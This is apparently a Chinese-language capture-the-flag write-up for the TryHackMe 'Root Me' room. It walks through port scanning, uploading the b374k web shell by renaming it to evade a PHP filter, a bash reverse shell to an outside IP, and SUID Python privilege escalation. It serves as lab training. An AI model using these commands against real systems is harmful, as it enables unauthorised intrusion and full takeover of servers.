[Day14] THM Root Me

• 网址 : https://tryhackme.com/room/rrootme
• IP : 10.10.233.205

扫描

• 起手式 nmap
  • nmap -A 10.10.233.205
  • 
    • 22 : SSH
      • 7.6p1 有枚举的漏洞 CVE-2018-15473
      • https://github.com/sriramoffcl/OpenSSH-7.6p1-Exploit-py-/blob/master/45233.py
    • 80 : Apache
      • Apache httpd 2.4.29
• 扫路径
  • python3 dirsearch.py -u http://10.10.233.205/ -e all
  • 看起来可能会有趣的路径
    • /panel/
    • /uploads/

上传 Webshell

• /panel/ 可以上传档案
  • 
  • 用 Wappalyzer 可以确定他是 PHP
    • 
• 这边我们来上传个多功能的 Web shell 玩玩ㄅ
• 上传 b374k.php
  • https://github.com/b374k/b374k
  • 
    • 会喷错，Google翻译说 PHP是不允许的！ (葡萄牙文)
• 试着使用 Apache 文件解析的漏洞
  • 把档名改成 b374k.php.aaa
  • 
  • Google 翻译 :文件上传成功！

使用 Webshell

• 点击下面的 Veja! 会跳转到 http://10.10.233.205/uploads/b374k.php.aaa
  • 
  • 使用预设密码 b374k 就能进入 shell

戳入 Reverse Shell

• 终端机输入 nc -vlk 7877
  • webshell 的 Terminal 输入
    • bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
  • 即可顺利连上 Reverse shell
    • 
• 交互型 Reverse shell
  • python -c 'import pty; pty.spawn("/bin/bash")'
• 取得 User Flag
  • 

提权

• 使用内建的上传功能，上传 LinEnum.sh
  • 开启权限 chmod +x LinEnum.sh
• 执行 LinEnum 并顺便输出到档案
  • ./LinEnum.sh | tee meow.txt
  • 
• 寻找到有趣的东西
  • /usr/bin/python 有 SUID
• 到 GTFOBins 找 Python 有 SUID 的提权方法
  • python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
• 提权成功
  •